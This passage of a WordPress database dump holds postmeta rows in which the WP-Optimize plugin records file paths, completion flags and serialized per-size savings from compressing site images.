KB to 2.53 KB saving 5.57 percent using WP-Optimize'),(163988,120546,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:2747;s:12:\"smushed-size\";i:2594;s:15:\"savings-percent\";d:5.57000000000000028421709430404007434844970703125;s:10:\"sizes-info\";a:2:{s:4:\"full\";a:2:{s:8:\"original\";i:2747;s:10:\"compressed\";i:2594;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2431;s:10:\"compressed\";i:2214;}}}'),(163989,120663,'original-file','2019/08/splash-ek-logo-white-2-updraft-pre-smush-original.png'),(163990,120663,'smush-complete','1'),(163991,120663,'smush-info','The file was compressed from 3.11 KB to 2.81 KB saving 9.71 percent using WP-Optimize'),(163992,120663,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:3182;s:12:\"smushed-size\";i:2873;s:15:\"savings-percent\";d:9.71000000000000085265128291212022304534912109375;s:10:\"sizes-info\";a:2:{s:4:\"full\";a:2:{s:8:\"original\";i:3182;s:10:\"compressed\";i:2873;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2360;s:10:\"compressed\";i:2217;}}}'),(163993,123035,'original-file','2019/08/spex-accord-1-updraft-pre-smush-original.jpg'),(163994,123035,'smush-complete','1'),(163995,123035,'smush-info','The file was compressed from 13.67 KB to 12.92 KB saving 5.51 percent using WP-Optimize'),(163996,123035,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:14001;s:12:\"smushed-size\";i:13230;s:15:\"savings-percent\";d:5.5099999999999997868371792719699442386627197265625;s:10:\"sizes-info\";a:5:{s:4:\"full\";a:2:{s:8:\"original\";i:14001;s:10:\"compressed\";i:13230;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:6316;s:10:\"compressed\";i:5905;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:1444;s:10:\"compressed\";i:1068;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:6886;s:10:\"compressed\";i:6451;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:7632;s:10:\"compressed\";i:7193;}}}'),(163997,123036,'original-file','2019/08/spex-accord-2-updraft-pre-smush-original.jpg'),(163998,123036,'smush-complete','1'),(163999,123036,'smush-info','The file was compressed from 8.53 KB to 7.97 KB saving 6.58 percent using WP-Optimize'),(164000,123036,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:8736;s:12:\"smushed-size\";i:8161;s:15:\"savings-percent\";d:6.5800000000000000710542735760100185871124267578125;s:10:\"sizes-info\";a:5:{s:4:\"full\";a:2:{s:8:\"original\";i:8736;s:10:\"compressed\";i:8161;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:3581;s:10:\"compressed\";i:3178;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:1165;s:10:\"compressed\";i:793;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:4351;s:10:\"compressed\";i:3923;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:3918;s:10:\"compressed\";i:3477;}}}'),(164001,123037,'original-file','2019/08/spex-accord-3-updraft-pre-smush-original.jpg'),(164002,123037,'smush-complete','1'),(164003,123037,'smush-info','The file was compressed from 11.50 KB to 11.08 KB saving 3.7 percent using WP-Optimize'),(164004,123037,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:11777;s:12:\"smushed-size\";i:11341;s:15:\"savings-percent\";d:3.70000000000000017763568394002504646778106689453125;s:10:\"sizes-info\";a:5:{s:4:\"full\";a:2:{s:8:\"original\";i:11777;s:10:\"compressed\";i:11341;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:4765;s:10:\"compressed\";i:4362;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:1278;s:10:\"compressed\";i:911;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:5468;s:10:\"compressed\";i:5081;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:5613;s:10:\"compressed\";i:5197;}}}'),(164005,123038,'original-file','2019/08/spex-accord-4-updraft-pre-smush-original.jpg'),(164006,123038,'smush-complete','1'),(164007,123038,'smush-info','The file was compressed from 9.54 KB to 8.92 KB saving 6.44 percent using WP-Optimize'),(164008,123038,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:9766;s:12:\"smushed-size\";i:9137;s:15:\"savings-percent\";d:6.44000000000000039079850466805510222911834716796875;s:10:\"sizes-info\";a:5:{s:4:\"full\";a:2:{s:8:\"original\";i:9766;s:10:\"compressed\";i:9137;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:3911;s:10:\"compressed\";i:3505;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:1118;s:10:\"compressed\";i:752;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:4890;s:10:\"compressed\";i:4479;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:4481;s:10:\"compressed\";i:4007;}}}'),(164009,123039,'original-file','2019/08/spex-accord-5-updraft-pre-smush-original.jpg'),(164010,123039,'smush-complete','1'),(164011,123039,'smush-info','The file was compressed from 10.13 KB to 9.75 KB saving 3.78 percent using WP-Optimize'),(164012,123039,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:10374;s:12:\"smushed-size\";i:9982;s:15:\"savings-percent\";d:3.779999999999999804600747665972448885440826416015625;s:10:\"sizes-info\";a:5:{s:4:\"full\";a:2:{s:8:\"original\";i:10374;s:10:\"compressed\";i:9982;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:4540;s:10:\"compressed\";i:4125;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:1279;s:10:\"compressed\";i:908;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:5158;s:10:\"compressed\";i:4725;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:5282;s:10:\"compressed\";i:4823;}}}'),(164013,123040,'original-file','2019/08/spex-accord-6-updraft-pre-smush-original.jpg'),(164014,123040,'smush-complete','1'),(164015,123040,'smush-info','The file was compressed from 20.01 KB to 18.61 KB saving 7.02 percent using WP-Optimize'),(164016,123040,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:20490;s:12:\"smushed-size\";i:19052;s:15:\"savings-percent\";d:7.019999999999999573674358543939888477325439453125;s:10:\"sizes-info\";a:5:{s:4:\"full\";a:2:{s:8:\"original\";i:20490;s:10:\"compressed\";i:19052;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:8094;s:10:\"compressed\";i:7696;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:1576;s:10:\"compressed\";i:1209;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:8789;s:10:\"compressed\";i:8382;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:10497;s:10:\"compressed\";i:9702;}}}'),(164017,124763,'original-file','2019/08/ECK_Temple_CO_015-o-1-updraft-pre-smush-original.jpg'),(164018,124763,'smush-complete','1'),(164019,124763,'smush-info','The file was compressed from 35.65 KB to 34.98 KB saving 1.87 percent using WP-Optimize'),(164020,124763,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:36504;s:12:\"smushed-size\";i:35823;s:15:\"savings-percent\";d:1.87000000000000010658141036401502788066864013671875;s:10:\"sizes-info\";a:10:{s:4:\"full\";a:2:{s:8:\"original\";i:36504;s:10:\"compressed\";i:35823;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:5380;s:10:\"compressed\";i:4962;}s:6:\"medium\";a:2:{s:8:\"original\";i:11256;s:10:\"compressed\";i:10801;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:1451;s:10:\"compressed\";i:1083;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:13498;s:10:\"compressed\";i:13128;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:8850;s:10:\"compressed\";i:8342;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:10615;s:10:\"compressed\";i:10167;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:20685;s:10:\"compressed\";i:20179;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:7322;s:10:\"compressed\";i:6879;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:16654;s:10:\"compressed\";i:16198;}}}'),(164021,125651,'original-file','2019/08/ECK_Temple_CO_001-lg-updraft-pre-smush-original.jpg'),(164022,125651,'smush-complete','1'),(164023,125651,'smush-info','The file was compressed from 120.74 KB to 105.43 KB saving 12.68 percent using WP-Optimize'),(164024,125651,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:123633;s:12:\"smushed-size\";i:107958;s:15:\"savings-percent\";d:12.67999999999999971578290569595992565155029296875;s:10:\"sizes-info\";a:14:{s:4:\"full\";a:2:{s:8:\"original\";i:123633;s:10:\"compressed\";i:107958;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:12666;s:10:\"compressed\";i:11556;}s:6:\"medium\";a:2:{s:8:\"original\";i:28016;s:10:\"compressed\";i:25476;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:136741;s:10:\"compressed\";i:124500;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:55846;s:10:\"compressed\";i:50821;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2191;s:10:\"compressed\";i:1761;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:41129;s:10:\"compressed\";i:37450;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:20028;s:10:\"compressed\";i:18213;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:80089;s:10:\"compressed\";i:72700;}s:5:\"wcbig\";a:2:{s:8:\"original\";i:146043;s:10:\"compressed\";i:133087;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:30438;s:10:\"compressed\";i:27670;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:73997;s:10:\"compressed\";i:67209;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:17638;s:10:\"compressed\";i:16059;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:52381;s:10:\"compressed\";i:47650;}}}'),(164025,125652,'original-file','2019/08/ECK_Temple_CO_002-lg-updraft-pre-smush-original.jpg'),(164026,125652,'smush-complete','1'),(164027,125652,'smush-info','The file was compressed from 75.42 KB to 72.99 KB saving 3.22 percent using WP-Optimize'),(164028,125652,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:77230;s:12:\"smushed-size\";i:74740;s:15:\"savings-percent\";d:3.220000000000000195399252334027551114559173583984375;s:10:\"sizes-info\";a:11:{s:4:\"full\";a:2:{s:8:\"original\";i:77230;s:10:\"compressed\";i:74740;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:12465;s:10:\"compressed\";i:11213;}s:6:\"medium\";a:2:{s:8:\"original\";i:30241;s:10:\"compressed\";i:27434;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:49226;s:10:\"compressed\";i:44943;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2326;s:10:\"compressed\";i:1882;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:37469;s:10:\"compressed\";i:34249;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:22696;s:10:\"compressed\";i:20525;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:80568;s:10:\"compressed\";i:74181;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:51364;s:10:\"compressed\";i:46964;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:17337;s:10:\"compressed\";i:15561;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:47735;s:10:\"compressed\";i:43525;}}}'),(164029,125653,'original-file','2019/08/ECK_Temple_CO_003-lg-updraft-pre-smush-original.jpg'),(164030,125653,'smush-complete','1'),(164031,125653,'smush-info','The file was compressed from 79.53 KB to 65.69 KB saving 17.4 percent using WP-Optimize'),(164032,125653,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:81441;s:12:\"smushed-size\";i:67270;s:15:\"savings-percent\";d:17.39999999999999857891452847979962825775146484375;s:10:\"sizes-info\";a:12:{s:4:\"full\";a:2:{s:8:\"original\";i:81441;s:10:\"compressed\";i:67270;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:11123;s:10:\"compressed\";i:10316;}s:6:\"medium\";a:2:{s:8:\"original\";i:28934;s:10:\"compressed\";i:26860;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:47873;s:10:\"compressed\";i:44461;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2127;s:10:\"compressed\";i:1714;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:34945;s:10:\"compressed\";i:32679;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:21303;s:10:\"compressed\";i:19676;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:77498;s:10:\"compressed\";i:72805;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:19714;s:10:\"compressed\";i:18211;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:45951;s:10:\"compressed\";i:42795;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:15705;s:10:\"compressed\";i:14484;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:44822;s:10:\"compressed\";i:41728;}}}'),(164033,125654,'original-file','2019/08/ECK_Temple_CO_004-lg-updraft-pre-smush-original.jpg'),(164034,125654,'smush-complete','1'),(164035,125654,'smush-info','The file was compressed from 68.65 KB to 55.55 KB saving 19.09 percent using WP-Optimize'),(164036,125654,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:70295;s:12:\"smushed-size\";i:56879;s:15:\"savings-percent\";d:19.089999999999999857891452847979962825775146484375;s:10:\"sizes-info\";a:12:{s:4:\"full\";a:2:{s:8:\"original\";i:70295;s:10:\"compressed\";i:56879;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:8868;s:10:\"compressed\";i:8376;}s:6:\"medium\";a:2:{s:8:\"original\";i:24508;s:10:\"compressed\";i:23098;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:42202;s:10:\"compressed\";i:39424;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:1840;s:10:\"compressed\";i:1438;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:27389;s:10:\"compressed\";i:26023;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:18239;s:10:\"compressed\";i:17161;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:66198;s:10:\"compressed\";i:62390;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:16881;s:10:\"compressed\";i:15897;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:39322;s:10:\"compressed\";i:36972;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:13597;s:10:\"compressed\";i:12734;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:38327;s:10:\"compressed\";i:36074;}}}'),(164037,125655,'original-file','2019/08/ECK_Temple_CO_005-lg-updraft-pre-smush-original.jpg'),(164038,125655,'smush-complete','1'),(164039,125655,'smush-info','The file was compressed from 137.34 KB to 86.56 KB saving 36.97 percent using WP-Optimize'),(164040,125655,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:140634;s:12:\"smushed-size\";i:88641;s:15:\"savings-percent\";d:36.969999999999998863131622783839702606201171875;s:10:\"sizes-info\";a:12:{s:4:\"full\";a:2:{s:8:\"original\";i:140634;s:10:\"compressed\";i:88641;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:15978;s:10:\"compressed\";i:14204;}s:6:\"medium\";a:2:{s:8:\"original\";i:32784;s:10:\"compressed\";i:29444;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:55385;s:10:\"compressed\";i:49812;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2690;s:10:\"compressed\";i:2199;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:46889;s:10:\"compressed\";i:41949;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:24749;s:10:\"compressed\";i:22122;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:82998;s:10:\"compressed\";i:75299;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:27937;s:10:\"compressed\";i:25053;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:62040;s:10:\"compressed\";i:56062;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:20108;s:10:\"compressed\";i:18007;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:53399;s:10:\"compressed\";i:48167;}}}'),(164041,125656,'original-file','2019/08/ECK_Temple_CO_006-lg-updraft-pre-smush-original.jpg'),(164042,125656,'smush-complete','1'),(164043,125656,'smush-info','The file was compressed from 78.19 KB to 64.24 KB saving 17.84 percent using WP-Optimize'),(164044,125656,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:80070;s:12:\"smushed-size\";i:65782;s:15:\"savings-percent\";d:17.839999999999999857891452847979962825775146484375;s:10:\"sizes-info\";a:12:{s:4:\"full\";a:2:{s:8:\"original\";i:80070;s:10:\"compressed\";i:65782;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:11662;s:10:\"compressed\";i:10703;}s:6:\"medium\";a:2:{s:8:\"original\";i:30247;s:10:\"compressed\";i:27844;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:43413;s:10:\"compressed\";i:40168;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2135;s:10:\"compressed\";i:1722;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:35222;s:10:\"compressed\";i:32586;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:22526;s:10:\"compressed\";i:20625;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:77803;s:10:\"compressed\";i:72423;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:20671;s:10:\"compressed\";i:18961;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:47474;s:10:\"compressed\";i:43866;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:16341;s:10:\"compressed\";i:14939;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:45356;s:10:\"compressed\";i:41881;}}}'),(164045,125657,'original-file','2019/08/ECK_Temple_CO_007-lg-updraft-pre-smush-original.jpg'),(164046,125657,'smush-complete','1'),(164047,125657,'smush-info','The file was compressed from 65.34 KB to 54.52 KB saving 16.55 percent using WP-Optimize'),(164048,125657,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:66904;s:12:\"smushed-size\";i:55831;s:15:\"savings-percent\";d:16.550000000000000710542735760100185871124267578125;s:10:\"sizes-info\";a:12:{s:4:\"full\";a:2:{s:8:\"original\";i:66904;s:10:\"compressed\";i:55831;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:10488;s:10:\"compressed\";i:9622;}s:6:\"medium\";a:2:{s:8:\"original\";i:24378;s:10:\"compressed\";i:22628;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:35414;s:10:\"compressed\";i:33178;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2109;s:10:\"compressed\";i:1694;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:30421;s:10:\"compressed\";i:28586;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:18236;s:10:\"compressed\";i:16827;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:61803;s:10:\"compressed\";i:58429;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:17135;s:10:\"compressed\";i:15814;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:37565;s:10:\"compressed\";i:35221;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:13400;s:10:\"compressed\";i:12317;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:36210;s:10:\"compressed\";i:33856;}}}'),(164049,125658,'original-file','2019/08/ECK_Temple_CO_008-lg-updraft-pre-smush-original.jpg'),(164050,125658,'smush-complete','1'),(164051,125658,'smush-info','The file was compressed from 55.33 KB to 45.89 KB saving 17.05 percent using WP-Optimize'),(164052,125658,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:56654;s:12:\"smushed-size\";i:46994;s:15:\"savings-percent\";d:17.050000000000000710542735760100185871124267578125;s:10:\"sizes-info\";a:12:{s:4:\"full\";a:2:{s:8:\"original\";i:56654;s:10:\"compressed\";i:46994;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:8621;s:10:\"compressed\";i:8107;}s:6:\"medium\";a:2:{s:8:\"original\";i:21098;s:10:\"compressed\";i:19902;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:31600;s:10:\"compressed\";i:29966;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:1937;s:10:\"compressed\";i:1541;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:25196;s:10:\"compressed\";i:23976;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:15931;s:10:\"compressed\";i:14930;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:54164;s:10:\"compressed\";i:51879;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:14696;s:10:\"compressed\";i:13755;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:32662;s:10:\"compressed\";i:31096;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:11758;s:10:\"compressed\";i:10976;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:31342;s:10:\"compressed\";i:29784;}}}'),(164053,125659,'original-file','2019/08/ECK_Temple_CO_009-lg-updraft-pre-smush-original.jpg'),(164054,125659,'smush-complete','1'),(164055,125659,'smush-info','The file was compressed from 52.33 KB to 41.87 KB saving 20 percent using WP-Optimize'),(164056,125659,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:53587;s:12:\"smushed-size\";i:42870;s:15:\"savings-percent\";d:20;s:10:\"sizes-info\";a:12:{s:4:\"full\";a:2:{s:8:\"original\";i:53587;s:10:\"compressed\";i:42870;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:8275;s:10:\"compressed\";i:7779;}s:6:\"medium\";a:2:{s:8:\"original\";i:20729;s:10:\"compressed\";i:19464;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:30769;s:10:\"compressed\";i:29100;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:1859;s:10:\"compressed\";i:1459;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:24416;s:10:\"compressed\";i:23187;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:15745;s:10:\"compressed\";i:14736;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:53553;s:10:\"compressed\";i:51183;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:14417;s:10:\"compressed\";i:13428;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:32252;s:10:\"compressed\";i:30570;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:11522;s:10:\"compressed\";i:10712;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:30841;s:10:\"compressed\";i:29197;}}}'),(164057,125660,'original-file','2019/08/ECK_Temple_CO_011-lg-updraft-pre-smush-original.jpg'),(164058,125660,'smush-complete','1'),(164059,125660,'smush-info','The file was compressed from 123.90 KB to 75.34 KB saving 39.19 percent using WP-Optimize'),(164060,125660,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:126876;s:12:\"smushed-size\";i:77152;s:15:\"savings-percent\";d:39.18999999999999772626324556767940521240234375;s:10:\"sizes-info\";a:12:{s:4:\"full\";a:2:{s:8:\"original\";i:126876;s:10:\"compressed\";i:77152;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:15509;s:10:\"compressed\";i:14111;}s:6:\"medium\";a:2:{s:8:\"original\";i:28911;s:10:\"compressed\";i:26559;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:46511;s:10:\"compressed\";i:42734;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2467;s:10:\"compressed\";i:2013;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:44743;s:10:\"compressed\";i:40407;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:21858;s:10:\"compressed\";i:20137;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:72309;s:10:\"compressed\";i:66268;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:24826;s:10:\"compressed\";i:22831;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:54315;s:10:\"compressed\";i:49797;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:17820;s:10:\"compressed\";i:16388;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:47115;s:10:\"compressed\";i:43185;}}}'),(164061,125661,'original-file','2019/08/ECK_Temple_CO_012-lg-updraft-pre-smush-original.jpg'),(164062,125661,'smush-complete','1'),(164063,125661,'smush-info','The file was compressed from 73.40 KB to 60.69 KB saving 17.32 percent using WP-Optimize'),(164064,125661,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:75159;s:12:\"smushed-size\";i:62145;s:15:\"savings-percent\";d:17.32000000000000028421709430404007434844970703125;s:10:\"sizes-info\";a:12:{s:4:\"full\";a:2:{s:8:\"original\";i:75159;s:10:\"compressed\";i:62145;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:11611;s:10:\"compressed\";i:10586;}s:6:\"medium\";a:2:{s:8:\"original\";i:29441;s:10:\"compressed\";i:26934;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:41552;s:10:\"compressed\";i:38461;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2167;s:10:\"compressed\";i:1753;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:33533;s:10:\"compressed\";i:31052;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:21976;s:10:\"compressed\";i:20104;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:73962;s:10:\"compressed\";i:68969;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:20352;s:10:\"compressed\";i:18566;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:45365;s:10:\"compressed\";i:41899;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:16205;s:10:\"compressed\";i:14734;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:43155;s:10:\"compressed\";i:39870;}}}'),(164065,125662,'original-file','2019/08/ECK_Temple_CO_013-lg-updraft-pre-smush-original.jpg'),(164066,125662,'smush-complete','1'),(164067,125662,'smush-info','The file was compressed from 39.24 KB to 36.93 KB saving 5.89 percent using WP-Optimize'),(164068,125662,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:40178;s:12:\"smushed-size\";i:37813;s:15:\"savings-percent\";d:5.88999999999999968025576890795491635799407958984375;s:10:\"sizes-info\";a:10:{s:4:\"full\";a:2:{s:8:\"original\";i:40178;s:10:\"compressed\";i:37813;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:11580;s:10:\"compressed\";i:10534;}s:6:\"medium\";a:2:{s:8:\"original\";i:26340;s:10:\"compressed\";i:24429;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:35160;s:10:\"compressed\";i:32503;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2117;s:10:\"compressed\";i:1697;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:33163;s:10:\"compressed\";i:30774;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:31133;s:10:\"compressed\";i:28984;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:11890;s:10:\"compressed\";i:10911;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:15822;s:10:\"compressed\";i:14429;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:37551;s:10:\"compressed\";i:34787;}}}'),(164069,125663,'original-file','2019/08/ECK_Temple_CO_014-lg-updraft-pre-smush-original.jpg'),(164070,125663,'smush-complete','1'),(164071,125663,'smush-info','The file was compressed from 96.79 KB to 47.66 KB saving 50.76 percent using 